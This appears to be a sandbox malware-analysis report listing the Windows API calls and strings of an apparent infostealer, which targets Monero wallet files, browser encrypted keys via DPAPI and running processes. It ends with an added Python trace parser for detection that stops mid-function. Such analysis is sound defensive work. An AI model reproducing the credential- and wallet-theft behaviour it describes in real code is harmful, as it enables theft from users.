                            • Instruction ID: 115fb40288a6ade84896ac0752692c3c2e32630112cbcb9211f97e43b5e89284
                            • Opcode Fuzzy Hash: 6f715b978fa0614f73c88dd74517967a845cbcdb6aa764aa8f07420d97bee621
                            • Instruction Fuzzy Hash: 3CE12C729505189BDB15FBA4DCA2EEE7739BF54300F008598F91672092EF386A4CDB72
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F48CF0: GetSystemTime.KERNEL32(00F50E1B,00989BB8,00F505B6,?,?,00F313F9,?,0000001A,00F50E1B,00000000,?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F48D16
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F3D581
                            • lstrlen.KERNEL32(00000000), ref: 00F3D798
                            • lstrlen.KERNEL32(00000000), ref: 00F3D7AC
                            • DeleteFileA.KERNEL32(00000000), ref: 00F3D82B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: a8a3c7a9bcd61818309e3581dc08b8e4dc5ad97de87f7447849201b1fbf18962
                            • Instruction ID: da06936b382727fa550393ed3b3f96796a4f836ede4a59536427952d7681df32
                            • Opcode Fuzzy Hash: a8a3c7a9bcd61818309e3581dc08b8e4dc5ad97de87f7447849201b1fbf18962
                            • Instruction Fuzzy Hash: 7A913072D505189BEB15FBA0DCA6EEE7739AF54304F404568F90672092EF387A08DB72
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F48CF0: GetSystemTime.KERNEL32(00F50E1B,00989BB8,00F505B6,?,?,00F313F9,?,0000001A,00F50E1B,00000000,?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F48D16
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F3D901
                            • lstrlen.KERNEL32(00000000), ref: 00F3DA9F
                            • lstrlen.KERNEL32(00000000), ref: 00F3DAB3
                            • DeleteFileA.KERNEL32(00000000), ref: 00F3DB32
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: d9287a5db0ffd07c8713004a78d3ded23213b9e2bb7e8238f2156e047b06caab
                            • Instruction ID: 8174934550a8083456499061432ca9cf950672cd343af764fbb680630c9a9f69
                            • Opcode Fuzzy Hash: d9287a5db0ffd07c8713004a78d3ded23213b9e2bb7e8238f2156e047b06caab
                            • Instruction Fuzzy Hash: 51813272D501189BDB15FBA4DCA6EEE7B39BF54304F404568F90662092EF386A08DB72
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AdjustPointer
                            • String ID:
                            • API String ID: 1740715915-0
                            • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                            • Instruction ID: 7bcca0863b000c7e3ab7b209d50aae52f0573b394d5cf4339c0f1d7bf9218876
                            • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                            • Instruction Fuzzy Hash: A251E4B2901206AFEB259F95C841BBA77A4FF42321F24423DF9058B591EB35ED44FB90
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00F3A664
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: @$v10$v20
                            • API String ID: 2746078483-278772428
                            • Opcode ID: 02c61e376ba5f7c8e8f4e1823147207e68de07cc8c2836ac5d0b9aff341378bf
                            • Instruction ID: 291b04d417914add682830791816e8b8a4b964712ae1d82782974ff8c33a866d
                            • Opcode Fuzzy Hash: 02c61e376ba5f7c8e8f4e1823147207e68de07cc8c2836ac5d0b9aff341378bf
                            • Instruction Fuzzy Hash: CA514C75A50208EFEB28EFA4CD96BED7B75BF40344F008118ED0A5B291DB746A05EB52
                            APIs
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F3A13C
                              • Part of subcall function 00F3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F3A161
                              • Part of subcall function 00F3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F3A181
                              • Part of subcall function 00F3A110: ReadFile.KERNEL32(000000FF,?,00000000,00F3148F,00000000), ref: 00F3A1AA
                              • Part of subcall function 00F3A110: LocalFree.KERNEL32(00F3148F), ref: 00F3A1E0
                              • Part of subcall function 00F3A110: CloseHandle.KERNEL32(000000FF), ref: 00F3A1EA
                              • Part of subcall function 00F48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F48FE2
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00F51678,00F50D93), ref: 00F3F64C
                            • lstrlen.KERNEL32(00000000), ref: 00F3F66B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: 5dd644178b41730835127df0db5d4c10db61cf57942a45e54a760f4372306813
                            • Instruction ID: 27a25185d115cd265e3fb2b388cba8632e971a26bb5bb489e7ea58a132412342
                            • Opcode Fuzzy Hash: 5dd644178b41730835127df0db5d4c10db61cf57942a45e54a760f4372306813
                            • Instruction Fuzzy Hash: EA512F72D401089BDB04FBA4DDA2DED7B39AF94344F408568FD1667191EF386A0CEB62
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 707c60e50afb45c0212315970b7aff16dd072ea0c2814c75f51bb1e6682324ac
                            • Instruction ID: 15a069daa981a9a96d11c9ab7d63c3fc6a3c18a367a505e0951ddd418d49972a
                            • Opcode Fuzzy Hash: 707c60e50afb45c0212315970b7aff16dd072ea0c2814c75f51bb1e6682324ac
                            • Instruction Fuzzy Hash: F2413F71D001099FEF04EFA4DC55AEEBB79EF54304F008118F91676281EB74AA05EFA2
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F3A13C
                              • Part of subcall function 00F3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F3A161
                              • Part of subcall function 00F3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F3A181
                              • Part of subcall function 00F3A110: ReadFile.KERNEL32(000000FF,?,00000000,00F3148F,00000000), ref: 00F3A1AA
                              • Part of subcall function 00F3A110: LocalFree.KERNEL32(00F3148F), ref: 00F3A1E0
                              • Part of subcall function 00F3A110: CloseHandle.KERNEL32(000000FF), ref: 00F3A1EA
                              • Part of subcall function 00F48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F48FE2
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F3A489
                              • Part of subcall function 00F3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F34F3E,00000000,00000000), ref: 00F3A23F
                              • Part of subcall function 00F3A210: LocalAlloc.KERNEL32(00000040,?,?,?,00F34F3E,00000000,?), ref: 00F3A251
                              • Part of subcall function 00F3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F34F3E,00000000,00000000), ref: 00F3A27A
                              • Part of subcall function 00F3A210: LocalFree.KERNEL32(?,?,?,?,00F34F3E,00000000,?), ref: 00F3A28F
                              • Part of subcall function 00F3A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F3A2D4
                              • Part of subcall function 00F3A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00F3A2F3
                              • Part of subcall function 00F3A2B0: LocalFree.KERNEL32(?), ref: 00F3A323
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 826d18b3cb3ea2d8bc91f9817a7a13febafb6426e174e5e5754aa170e66be3fd
                            • Instruction ID: 640e53371abbfbebf3551951b8a60307faced4bf986f183036f7ebb1593693f3
                            • Opcode Fuzzy Hash: 826d18b3cb3ea2d8bc91f9817a7a13febafb6426e174e5e5754aa170e66be3fd
                            • Instruction Fuzzy Hash: CE3150B6D10608ABCF04DBA5DC45AEFB7B8BB58310F044518E941A3281E735EE05DBA2
                            APIs
                            • memset.MSVCRT ref: 00F4967B
                              • Part of subcall function 00F48EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00F496AE,00000000), ref: 00F48EEB
                              • Part of subcall function 00F48EE0: RtlAllocateHeap.NTDLL(00000000), ref: 00F48EF2
                              • Part of subcall function 00F48EE0: wsprintfW.USER32 ref: 00F48F08
                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00F4973B
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F49759
                            • CloseHandle.KERNEL32(00000000), ref: 00F49766
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                            • String ID:
                            • API String ID: 3729781310-0
                            • Opcode ID: f2ac798336997b6e3250789a96b24ec672c6024f2cf8852e590fe79da767e60e
                            • Instruction ID: f9e0ef7cd2cbb5085ca56224a17ebc03c873aa834c381ee121263c369d521717
                            • Opcode Fuzzy Hash: f2ac798336997b6e3250789a96b24ec672c6024f2cf8852e590fe79da767e60e
                            • Instruction Fuzzy Hash: 98314A75E002089FDB14DFE0DD49BEEB779BB44700F104558FA06AB289DBB86A48DB51
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00F505BF), ref: 00F4885A
                            • Process32First.KERNEL32(?,00000128), ref: 00F4886E
                            • Process32Next.KERNEL32(?,00000128), ref: 00F48883
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • CloseHandle.KERNEL32(?), ref: 00F488F1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 17296f79ba8b035e9de222c770dda0d07c3c7140047c6d1b494509dd042da1b1
                            • Instruction ID: 34550017924485f61a90a237f4ad33f0412f161dd4268432b51d5b159f8f0ba4
                            • Opcode Fuzzy Hash: 17296f79ba8b035e9de222c770dda0d07c3c7140047c6d1b494509dd042da1b1
                            • Instruction Fuzzy Hash: 99319C71941618EBDB25EF90DC95FEEBB78FB44740F004299F90AA2190DF346A44DFA1
                            APIs
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FAFE13
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FAFE2C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Similarity
                            • API ID: Value___vcrt_
                            • String ID:
                            • API String ID: 1426506684-0
                            • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                            • Instruction ID: 6c68a5e1e016db4ff4b04184bb73e275a09df6399a6831355db0ea466fe1920c
                            • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                            • Instruction Fuzzy Hash: C6012472609721EEF63427B59CC9AAB36A4FB023F07304339F112881F2EF554C45B540
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F50DE8,00000000,?), ref: 00F47B40
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F47B47
                            • GetLocalTime.KERNEL32(?,?,?,?,?,00F50DE8,00000000,?), ref: 00F47B54
                            • wsprintfA.USER32 ref: 00F47B83
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 30de8149dab3fab2fc79cdf790ead756d84b7266edd25607010ed358e28e3844
                            • Instruction ID: e0aa41bd93ba977038fcd2b0af60336e1da747db10f07b680b6bcd538cd9bfd3
                            • Opcode Fuzzy Hash: 30de8149dab3fab2fc79cdf790ead756d84b7266edd25607010ed358e28e3844
                            • Instruction Fuzzy Hash: 3F1130B2904118ABCB14DFC9ED49BBEB7B8FB4CB11F10421AF645A2284D3395940D7B0
                            APIs
                            • CreateFileA.KERNEL32(00F43D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00F43D3E,?), ref: 00F4948C
                            • GetFileSizeEx.KERNEL32(000000FF,00F43D3E), ref: 00F494A9
                            • CloseHandle.KERNEL32(000000FF), ref: 00F494B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID:
                            • API String ID: 1378416451-0
                            • Opcode ID: a1c6d6c303bb5d20db524760eb3d4cf8a3f695bd12a8ceabcdd59d0bf930a5c6
                            • Instruction ID: 15a48b9934a0a3064edae5da1e20cee32ae81094846209ba6ec1150adcadac0e
                            • Opcode Fuzzy Hash: a1c6d6c303bb5d20db524760eb3d4cf8a3f695bd12a8ceabcdd59d0bf930a5c6
                            • Instruction Fuzzy Hash: EBF03139F04208BBDB20DBB0EC49F5FBBBAAB48710F10C654FA51A71C4D674A6019B80
                            APIs
                            • __getptd.LIBCMT ref: 00F4CA7E
                              • Part of subcall function 00F4C2A0: __amsg_exit.LIBCMT ref: 00F4C2B0
                            • __getptd.LIBCMT ref: 00F4CA95
                            • __amsg_exit.LIBCMT ref: 00F4CAA3
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00F4CAC7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 7c26677111dddfa81d07090a216268f0393193327dbe548f7bd22822b9216405
                            • Instruction ID: 53722882ff7adf6731081293481c7f481c1e20e79fb014f4364d7a71c0df8963
                            • Opcode Fuzzy Hash: 7c26677111dddfa81d07090a216268f0393193327dbe548f7bd22822b9216405
                            • Instruction Fuzzy Hash: C7F062329463189BD7A1FBA85C0675E3EA0AF00721F101149EE05971D3DBAC9940B6D5
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Similarity
                            • API ID: Catch
                            • String ID: MOC$RCC
                            • API String ID: 78271584-2084237596
                            • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                            • Instruction ID: e6f509e4436711384a6b64923d9c9e43d0b4844e3f098a99cd0453cd477c5aa4
                            • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                            • Instruction Fuzzy Hash: E64159B2D00209AFCF26DF99DD81AEEBBB5BF48314F188099F90566211DB359990EF50
                            APIs
                              • Part of subcall function 00F48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F48F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 00F451CA
                            • lstrcat.KERNEL32(?,00F51058), ref: 00F451E7
                            • lstrcat.KERNEL32(?,00988870), ref: 00F451FB
                            • lstrcat.KERNEL32(?,00F5105C), ref: 00F4520D
                              • Part of subcall function 00F44B60: wsprintfA.USER32 ref: 00F44B7C
                              • Part of subcall function 00F44B60: FindFirstFileA.KERNEL32(?,?), ref: 00F44B93
                              • Part of subcall function 00F44B60: StrCmpCA.SHLWAPI(?,00F50FC4), ref: 00F44BC1
                              • Part of subcall function 00F44B60: StrCmpCA.SHLWAPI(?,00F50FC8), ref: 00F44BD7
                              • Part of subcall function 00F44B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00F44DCD
                              • Part of subcall function 00F44B60: FindClose.KERNEL32(000000FF), ref: 00F44DE2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: c00519842d57495bd92641d922a12d104505535bd7d72a33087bc56eb42c3fb2
                            • Instruction ID: 1c9f8f834b18811d8986895dca5536dac6a0ad4b6f4c6c8271f768ed47f7fbfe
                            • Opcode Fuzzy Hash: c00519842d57495bd92641d922a12d104505535bd7d72a33087bc56eb42c3fb2
                            • Instruction Fuzzy Hash: C521F276900208AFD725F770FC4AEED373CAB94300F004654BA5656186DE78A6CCDB51
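The API bullets of this record (SHGetFolderPathA called with CSIDL value 0x1C, which is CSIDL_LOCAL_APPDATA, four lstrcat calls that extend the returned path, then a subcall pairing wsprintfA with FindFirstFileA, two StrCmpCA comparisons, FindNextFileA and FindClose) have the shape of a directory walk under a known user folder, which is what the API ID lstrcat$Find$File$CloseFirstFolderNextPathwsprintf summarises. The Python below is added here as an illustrative example; it is neither Joe Sandbox nor Stealc code. It parses bullets in the format shown above, decodes the CSIDL argument and applies that folder-walk rule. The trace string is this record's own bullets copied inline, the CSIDL table is the standard shlobj.h values, and the reading of the two StrCmpCA calls as a "." / ".." skip is an inference (the compared constants are not shown in the report), labelled as such in the code.

```python
"""Decode the per-function API bullets Joe Sandbox prints (as above) and
flag the folder-walk / file-grabber pattern they imply.

Added illustrative example for this page; neither Joe Sandbox nor Stealc
code.  The line format, the CSIDL table and the rule are the editor's own
reconstruction of what the report shows.
"""
import re

# Constructed input: the "APIs" bullets of the record above, bullet glyphs
# removed, otherwise verbatim.
SAMPLE_TRACE = """\
Part of subcall function 00F48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F48F9B
lstrcat.KERNEL32(?,00000000), ref: 00F451CA
lstrcat.KERNEL32(?,00F51058), ref: 00F451E7
lstrcat.KERNEL32(?,00988870), ref: 00F451FB
lstrcat.KERNEL32(?,00F5105C), ref: 00F4520D
Part of subcall function 00F44B60: wsprintfA.USER32 ref: 00F44B7C
Part of subcall function 00F44B60: FindFirstFileA.KERNEL32(?,?), ref: 00F44B93
Part of subcall function 00F44B60: StrCmpCA.SHLWAPI(?,00F50FC4), ref: 00F44BC1
Part of subcall function 00F44B60: StrCmpCA.SHLWAPI(?,00F50FC8), ref: 00F44BD7
Part of subcall function 00F44B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00F44DCD
Part of subcall function 00F44B60: FindClose.KERNEL32(000000FF), ref: 00F44DE2
"""

# One bullet: optional subcall prefix, Api.MODULE, optional (args), ref: addr.
# The wsprintfA bullet carries no argument list, so that group is optional.
LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# CSIDL values from shlobj.h; only the low byte matters because callers may
# OR in CSIDL_FLAG_CREATE (0x8000).
CSIDL = {
    0x00: "CSIDL_DESKTOP", 0x05: "CSIDL_PERSONAL", 0x10: "CSIDL_DESKTOPDIRECTORY",
    0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA", 0x23: "CSIDL_COMMON_APPDATA",
    0x24: "CSIDL_WINDOWS", 0x25: "CSIDL_SYSTEM", 0x26: "CSIDL_PROGRAM_FILES",
    0x28: "CSIDL_PROFILE",
}


def parse_trace(text):
    """Turn bullet lines into dicts; an unresolved argument stays as '?'."""
    calls = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised trace line: {line!r}")
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": [] if args is None else args.split(","),
            "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return calls


def decode_csidl(call):
    """Folder name for an SHGetFolderPathA/W call (2nd parameter), else None."""
    if not call["api"].startswith("SHGetFolderPath") or len(call["args"]) < 2:
        return None
    raw = call["args"][1]
    if raw == "?":          # sandbox could not resolve the value
        return None
    low = int(raw, 16) & 0xFF
    return CSIDL.get(low, f"CSIDL_0x{low:02X}")


def classify(calls):
    """Folder-walk rule: known folder + path building + FindFirst/Next/Close."""
    apis = [c["api"] for c in calls]
    folders = [f for f in map(decode_csidl, calls) if f]
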